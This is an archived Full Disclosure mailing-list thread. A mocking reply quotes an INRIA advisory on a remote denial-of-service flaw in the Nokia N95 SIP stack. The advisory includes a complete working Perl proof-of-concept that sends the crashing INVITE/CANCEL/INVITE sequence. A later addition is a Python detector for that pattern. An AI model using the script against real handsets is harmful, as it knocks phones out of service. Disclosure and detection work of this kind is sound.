Full Disclosure mailing list archives

Re: Nokia N95 cellphone remote DoS using the SIP Stack


From: reepex <reepex () gmail com>
Date: Wed, 5 Dec 2007 13:21:06 -0600

So, almighty PhD, what is your thesis exactly?

To me it seems to be 'how to run a fuzzer, then write crappy Perl scripts
to exploit DoS conditions'.

Does this properly summarize your PhD credentials?

I guess you could tack on 'after writing the crappy scripts, flood mailing
lists with our crap, and get made fun of'.

I am sure you will serve the academic community greatly one day when you teach
"hacking" classes revolving around the latest editions of Hacking Exposed.



On Dec 5, 2007 11:05 AM, Radu State <State () loria fr> wrote:

 Nokia N95 cellphone remote DoS using the SIP Stack



Severity:

High – Denial of Service



Hardware:

Nokia N95



Firmware:

Tested version: Nokia RM-159 V 12.0.013



Notification:

Vulnerability found: 11 September 2007

Contacted Nokia Support: 12 September 2007 / no reply

Contacted Nokia Security Support: 19 September 2007 / no reply



Vulnerability Synopsis:

If the device has the SIP Phone client activated, a sequence of SIP
messages turns the device into an inconsistent state where the user is not able
to operate it anymore until it reboots.



The sequence of messages consists of 2 different SIP dialogs: the
first initiates an INVITE transaction but immediately closes it (prematurely),
while the second initiates a normal INVITE transaction that triggers the
vulnerability of the target.



The sequence of messages is illustrated below.



X ------------------------- INVITE -----------------------> Nokiav12

X <---------------------- 100 Trying ---------------------- Nokiav12

X ------------------------- CANCEL -----------------------> Nokiav12

X <----------------- OK (to the Cancel) ------------------- Nokiav12

X <---------------- 487 Request Terminated ---------------- Nokiav12



--------New Dialog--------



X ------------------------- INVITE -----------------------> Nokiav12

X <---------------------- 100 Trying ---------------------- Nokiav12

X <---------------------- 180 Trying ---------------------- Nokiav12



---- The device does not work properly anymore ----



Impact:

A remote entity can take down all the services of the cell phone



Resolution:

As we did not get any proper reply from Nokia about the subject, the best
option is to disable the SIP client.



Credits:

Humberto J. Abdelnur (Ph.D Student)

Radu State (Ph.D)

Olivier Festor (Ph.D)



This vulnerability was identified by the Madynes research team at INRIA
Lorraine, using KiF the Madynes VoIP fuzzer.

http://madynes.loria.fr/





Proof of Concept:



A Perl script (nokiav12.pl) is attached to this mail. Before launching
it, the SIP phone has to be initialised on the target device.



Command:

perl nokiav12.pl <dst_IP> <username> <SourceIp> <SourceUsername>



E.g. perl nokiav12.pl 192.168.1.119 lupilu 192.168.1.2 tucu





#!/usr/bin/perl

##################################################
# Vulnerability discovered using KiF ~ Kiph      #
#                                                #
# Authors:                                       #
#   Humberto J. Abdelnur (Ph.D Student)          #
#   Radu State (Ph.D)                            #
#   Olivier Festor (Ph.D)                        #
#                                                #
# Madynes Team, LORIA - INRIA Lorraine           #
# http://madynes.loria.fr                        #
##################################################

use strict;
use warnings;
use IO::Socket::INET;
use String::Random;

die "Usage $0 <targetIP> <targetUser> <attackerIP> <attackerUser>\n"
    unless ($ARGV[3]);

my $targetIP     = $ARGV[0];
my $targetUser   = $ARGV[1];
my $attackerIP   = $ARGV[2];
my $attackerUser = $ARGV[3];

# Bind the local SIP port as well, so the phone's responses come back here.
my $socket = IO::Socket::INET->new(
    Proto     => 'udp',
    PeerPort  => 5060,
    PeerAddr  => $targetIP,
    LocalPort => 5060)
    or die "cannot create socket: $@\n";

my $foo    = String::Random->new;
my $callid = $foo->randpattern("CCccnCn");
my $cseq   = $foo->randregex('\d\d\d\d');

# SDP offer carried by both INVITEs. Each "\r" plus the literal newline
# yields the CRLF line ending SIP/SDP expect.
my $sdp = "v=0\r
o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r
s=-\r
c=IN IP4 $attackerIP\r
t=0 0\r
m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r
a=sendrecv\r
a=ptime:20\r
a=maxptime:200\r
a=fmtp:96 mode-change-neighbor=1\r
a=fmtp:18 annexb=no\r
a=fmtp:98 0-15\r
a=rtpmap:96 AMR/8000/1\r
a=rtpmap:0 PCMU/8000/1\r
a=rtpmap:8 PCMA/8000/1\r
a=rtpmap:97 iLBC/8000/1\r
a=rtpmap:18 G729/8000/1\r
a=rtpmap:98 telephone-event/8000/1\r
a=rtpmap:13 CN/8000/1\r
";

my $sdplen = length $sdp;

# Dialog 1: INVITE, wait for the 100 Trying, then CANCEL the same
# transaction (same branch and CSeq number, method CANCEL).
my $msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);

my $text = '';
until ($text =~ /^SIP\/2\.0 100/) {
    $socket->recv($text, 1024, 0);
}

$msg = "CANCEL sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r
From: <sip:$attackerUser\@$attackerIP>;tag=1\r
To: <sip:$targetUser\@$targetIP>;tag=1\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq CANCEL\r
Max-Forwards: 70\r
Content-Length: 0\r
\r
";
$socket->send($msg);
sleep(1);

# Dialog 2: fresh Call-ID, CSeq, tag and branch. This second INVITE is the
# one that leaves the phone in the inconsistent state.
$callid = $foo->randpattern("CCccnCn");
$cseq   = $foo->randregex('\d\d\d\d');
$msg = "INVITE sip:$targetUser\@$targetIP SIP/2.0\r
Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK2\r
From: <sip:$attackerUser\@$attackerIP>;tag=2\r
To: <sip:$targetUser\@$targetIP>\r
Call-ID: $callid\@$attackerIP\r
CSeq: $cseq INVITE\r
Contact: <sip:$attackerUser\@$attackerIP>\r
Max-Forwards: 70\r
Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, MESSAGE\r
Content-Type: application/sdp\r
Content-Length: $sdplen\r
\r
$sdp";
$socket->send($msg);








_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
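
The two-dialog exchange described in the quoted advisory, as an added example that is not part of the original post or of the Madynes PoC: a small Python SIP codec (request and response builders plus a header parser) and a dialog tracker that replays the sequence with both sides' messages and flags the cancel-then-reinvite pattern, as well as the 487 Request Terminated that the Perl script never ACKs. All names here (build_request, parse_message, SipTracker, the sample Call-IDs, the trimmed SDP) are this example's own assumptions; the user names and addresses are simply the ones from the advisory's example command line, and the second dialog's 180 is labelled Ringing as RFC 3261 names it.

```python
"""Added example, not the advisory's or the Madynes team's code: a minimal
SIP codec and a dialog tracker that replays the advisory's two dialogs.
Everything named here is this example's own assumption."""
from dataclasses import dataclass

CRLF = "\r\n"
TARGET = ("lupilu", "192.168.1.119")   # from the advisory's example command
SOURCE = ("tucu", "192.168.1.2")
# Constructed SDP offer, trimmed to a single PCMU stream.
SDP = CRLF.join(["v=0", f"o=- 1 1 IN IP4 {SOURCE[1]}", "s=-",
                 f"c=IN IP4 {SOURCE[1]}", "t=0 0",
                 "m=audio 49152 RTP/AVP 0", "a=rtpmap:0 PCMU/8000"]) + CRLF


def build_request(method, target, source, call_id, cseq, branch, from_tag,
                  to_tag=None, body=""):
    """Serialise one SIP request with RFC 3261 framing (CRLF line ends,
    Content-Length computed from the body). A CANCEL must reuse the
    INVITE's branch and CSeq number, which the caller supplies."""
    t_user, t_ip = target
    s_user, s_ip = source
    to_hdr = f"<sip:{t_user}@{t_ip}>" + (f";tag={to_tag}" if to_tag else "")
    headers = [
        f"Via: SIP/2.0/UDP {s_ip};branch={branch}",
        f"From: <sip:{s_user}@{s_ip}>;tag={from_tag}",
        f"To: {to_hdr}",
        f"Call-ID: {call_id}@{s_ip}",
        f"CSeq: {cseq} {method}",
        "Max-Forwards: 70",
        f"Content-Length: {len(body.encode())}",
    ]
    if body:
        headers.append("Content-Type: application/sdp")
    start = f"{method} sip:{t_user}@{t_ip} SIP/2.0"
    return CRLF.join([start, *headers]) + CRLF + CRLF + body


def parse_message(raw):
    """Split a SIP message into (start line, lower-cased header dict, body);
    returns None when the CRLF CRLF header terminator is missing."""
    head, sep, body = raw.partition(CRLF + CRLF)
    if not sep:
        return None
    start, *hdr_lines = head.split(CRLF)
    headers = {}
    for line in hdr_lines:
        name, colon, value = line.partition(":")
        if colon:
            headers[name.strip().lower()] = value.strip()
    return start, headers, body


def build_response(code, reason, request):
    """The response a UAS sends: status line plus the request's
    Via/From/To/Call-ID/CSeq copied back (header names are case-insensitive)."""
    _, hdr, _ = parse_message(request)
    lines = [f"SIP/2.0 {code} {reason}"]
    for name in ("via", "from", "to", "call-id", "cseq"):
        lines.append(f"{name.title()}: {hdr[name]}")
    lines.append("Content-Length: 0")
    return CRLF.join(lines) + CRLF + CRLF


@dataclass
class Dialog:
    source: str
    cancelled: bool = False
    got_487: bool = False
    acked: bool = False


class SipTracker:
    """Follows each Call-ID through INVITE/CANCEL/487/ACK and records the
    cancel-then-reinvite pattern from the advisory plus 487s never ACKed."""

    def __init__(self):
        self.dialogs = {}      # Call-ID -> Dialog, in arrival order
        self.findings = []

    def feed(self, raw):
        parsed = parse_message(raw)
        if parsed is None:
            self.findings.append("malformed: no CRLFCRLF terminator")
            return
        start, hdr, _ = parsed
        call_id = hdr.get("call-id", "")
        if start.startswith("SIP/2.0 "):               # a response
            code = int(start.split()[1])
            if code == 487 and call_id in self.dialogs:
                self.dialogs[call_id].got_487 = True
            return
        method = start.split()[0]
        source = hdr.get("from", "").split(";")[0]     # From URI without tag
        if method == "INVITE" and call_id not in self.dialogs:
            prev = [d for d in self.dialogs.values() if d.source == source]
            if prev and prev[-1].cancelled:
                self.findings.append(f"cancel-then-reinvite from {source}")
            self.dialogs[call_id] = Dialog(source)
        elif method == "CANCEL" and call_id in self.dialogs:
            self.dialogs[call_id].cancelled = True
        elif method == "ACK" and call_id in self.dialogs:
            self.dialogs[call_id].acked = True

    def unacked_487(self):
        """Call-IDs whose INVITE drew a 487 that the client never ACKed
        (RFC 3261 requires that ACK; the advisory's script sends none)."""
        return [cid for cid, d in self.dialogs.items() if d.got_487 and not d.acked]


def advisory_sequence():
    """The advisory's exchange as constructed messages: the client's requests
    and the responses the advisory reports the phone returning."""
    inv1 = build_request("INVITE", TARGET, SOURCE, "abc1234", 1000, "z9hG4bK1", "1", body=SDP)
    cancel = build_request("CANCEL", TARGET, SOURCE, "abc1234", 1000, "z9hG4bK1", "1")
    inv2 = build_request("INVITE", TARGET, SOURCE, "xyz5678", 2000, "z9hG4bK2", "2", body=SDP)
    return [inv1, build_response(100, "Trying", inv1),
            cancel, build_response(200, "OK", cancel),
            build_response(487, "Request Terminated", inv1),
            inv2, build_response(100, "Trying", inv2),
            build_response(180, "Ringing", inv2)]


def analyse(messages):
    """Replay a message list; returns (findings, Call-IDs with unACKed 487)."""
    tracker = SipTracker()
    for m in messages:
        tracker.feed(m)
    return tracker.findings, tracker.unacked_487()


if __name__ == "__main__":
    print(analyse(advisory_sequence()))
```

Fed the advisory's sequence, analyse() reports one cancel-then-reinvite finding for the attacker's From URI and lists the first Call-ID as carrying an unACKed 487; inserting an ACK for the first dialog before the second INVITE clears the latter but not the former, which is the signal a SIP-aware sensor in front of such handsets would key on.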